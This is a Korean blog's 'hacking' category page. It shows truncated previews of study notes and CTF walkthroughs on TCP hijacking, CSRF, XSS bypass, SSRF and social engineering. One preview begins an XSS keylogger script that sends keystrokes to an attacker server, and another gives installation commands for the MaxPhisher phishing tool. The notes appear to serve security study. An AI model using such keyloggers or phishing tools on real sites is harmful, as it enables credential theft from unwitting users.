본문 바로가기

해킹

(122)
해킹 기법 - Hash Cracking 케빈 미트닉 > 사회공학기법의 달인 전화 해킹. * 보안! 돈 주고 사는 프로그램, 솔루션이 아니다. rsh -> ssh rlogin R 서비스 . ( Remote ) 홈디렉토리. .rhosts. IP주소 JSZ : IRC IP 스푸핑으로 인증을 다 뚫어버릴 수 있음 공격 원리 TCP Session Hijacking > 클라이언트 pc는 syn 대답을 못하게 마비를 시켜버리고, 공격 pc로 서버에 syn을 날리면 서버가 클라이언트 pc에 synack를 보내고 다시 공격 pc가 ack를 날려서 완성시킨다. (클라이언트 pc는 syn응답을 하지 못하는 마비상태이므로) * TCP / UDP 데이터를 보내는 방법의 차이 - TCP : 데이터 잘 보내는 것 - UDP : 막 보내는 것 * TCP 연결 과정 3 W..
[9주차] 해킹 스터디 정리 - CSRF Token, SSRF, File Upload 공격 CSRF 공격 Remind > 요청이 서버에 날라간다. -WHERE > 모든 요청 -> 컨설턴트 주관 -> "비밀번호 변경" -> 게시판 글을 작성 CSRF (1) GET method > URL > 로그인 한 다음에 볼 수 있는 페이지 (2) POST method > 무조건 XSS 공격 포인트를 찾아야 함 -> 같은 도메인에서. 왜 꼭 같은 도메인?! -> 세션을 이용하기 위해서! 예전에는 공격자 사이트에 접속만 해도 모든 입력 정보를 받을 수 있었다. 최근에는 좀 더 똑똑해져서 도메인 별로 쿠키를 다르게 뿌려준다. (3) Referrer Bypass -> meta (4) CSRF Token -> 요청을 위조할 수 있다. -> XSS 공격이 있다면 Bypass 가능. 게시판이 위 코드를 복붙해서 원하는 ..
CSRF CTF 문제풀이 #1 이번엔 CSRF CTF 1번 문제를 풀어보도록 하겠습니다 CSRF 공격을 이용해 admin 계정의 비밀번호를 바꾸게 해야합니다. CSRF 공격은 폭과 높이를 0으로 숨긴 iframe을 써서 action 속성으로 전달된 창이 뜨지 않게 할 수 있습니다. 코드를 보면 게시판만 읽어도 mypage_update.php에서 회원 정보를 수정한 효과를 얻을 수 있습니다. Javascript에서는 document.forms 객체로 form 태그에서 사용되는 양식들을 제어할 수 있습니다. 코드대로라면 document.forms[0].submit()은 코드의 처음 form 태그 안에 존재하는 submit 속성을 가진 input을 누르게 될 겁니다. document.forms 사용법 →document.forms[0] →d..
[8주차] 해킹 스터디 정리 - XSS Bypass, 대응 방안, CSRF 공격 - XSS Bypass (우회 방법) > Anti XSS Bypass -> Black List 필터링 --> WAF의 기본 속성 (Web Application Firewall) ex ) 글자 제한이 있을 때 미리 짜놓은 스크립트를 준비해놓고 src로 주입가능 [3]대소문자 혼용 그런데 이건 어떻게 공격으로 연결시킬까? POST 방식을 GET방식으로 바꿔서 링크를 딴다. 그 후, 살포해서 공격 가능 keylogger 삽입 KeyLogger 코드 -- XSS Keylogger var keys = ""; var hackUrl = '공격서버 url' document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCo..
해킹 툴 - MaxPhisher 설치 및 사용법 저번에 들었던 MaxPhisher가 아주 매력적인 라이브러리 툴이라 생각되어 어떻게 사용하는지 한번 사용해보았다 MaxPhisher의 git에 들어가면 설치 방법과 사용법이 차례대로 소개되어있다. 처음에 냅다 git도 깔지 않고 git clone 코드를 입력했더니 안 되었다. 당연한걸.. sudo apt install git python3 php openssh-client -y 이때 -y 옵션은 yes로 설치 시 나타나는 모든 물음에 yes라고 답한다는 뜻이다. 설치과정 중 추가적인 디펜던시나 라이브러리 등의 설치 시 모두 yes를 답한다. 터미널에 코드를 입력하면 설치를 시작한다. Progress 바로 설치 진행률이 보인다. git clone https://github.com/KasRoudra/MaxP..
해킹 기법 - 사회공학기법, 피싱, maxphisher 해킹할 때, 코딩이 필요할까??? > 무조건. > 농구하는데, 점프 없이 농구 가능할까? 하는 느낌 > 그러나 코딩을 다 배우고, 해킹공부를 하는 건 아니다. 사회공학기법. 사람을 속이는 것. 사람의 심리를 공격 사기꾼. - 암호 해킹 기법 [고무 호스 암호 분석] ---------------------------------------------------------------------------------------- [ - ] Piggybacking -> 리얼월드에서 가능 > 어느 회사든 사무실까지 갈 자신. ** 20억이 넘는 보안 시스템. 정부 청사. > 대학생 한명한테 해킹당해 뚫림 -------------------------------------------------------- IP주소 ..
XSS CTF 정리 3번 문제 이번엔 XSS CTF 3번 문제를 풀어보겠습니다. 목표는 alert를 띄울 수 있는 Reflected XSS 취약점을 찾는 것입니다. 처음 로그인 창이 뜨는 것은 2번 문제와 같습니다. 아마 계정이 연동될테니 그대로 로그인 하겠습니다. 예상대로 로그인 되었습니다. 마이페이지를 들어가 보겠습니다. Burp Suite로 어떤 파라미터가 들어있는지 분석해봅니다. 이 페이지는 user라는 파라미터를 GET 방식으로 보내고 있는데, 저 인코딩된 문자를 디코딩해보면 내 이름이 나오는 것을 알 수 있습니다. 검색 기능에 hi를 넣고 user 파라미터에 hi로 바꿔 send를 눌렀더니 match가 되는 것을 확인할 수 있습니다. 실제 페이지에서 테스트를 해봐도 placeholder의 값이 잘 적용됩니다. 럭키입니다. ..
XSS CTF 정리 2번 문제 XSS CTF 2번째 문제를 풀어보겠습니다. 링크로 들어가면 로그인 버튼과 문의 게시판 버튼이 보입니다. 로그인 창은 간단히 이메일과 비밀번호 입력란으로 구성되어있습니다. 1번에서 회원가입을 해놔서 다시 해야하려나? 했는데 제 아이디가 이미 가입되어있다고 뜹니다. 3번과 7번도 그대로 이용하면 되는 것 같습니다. 이 창은 로그인 안 한 상태로 문의 게시판에 들어갔을 때 나온 창입니다. 제목을 쓰고 내용을 입력할 수 있게 되어있습니다. 일단 로그인을 해보겠습니다. 마이페이지를 누르면 나오는 창입니다. 공지 사항을 누르면 나오는 페이지입니다. Burp Suite로 히스토리를 살펴보면서 이곳저곳 탐험해줍니다. 회원 정보 수정에서 GET방식으로 user라는 파라미터가 전송되고 있는걸 볼 수 있습니다. Repea..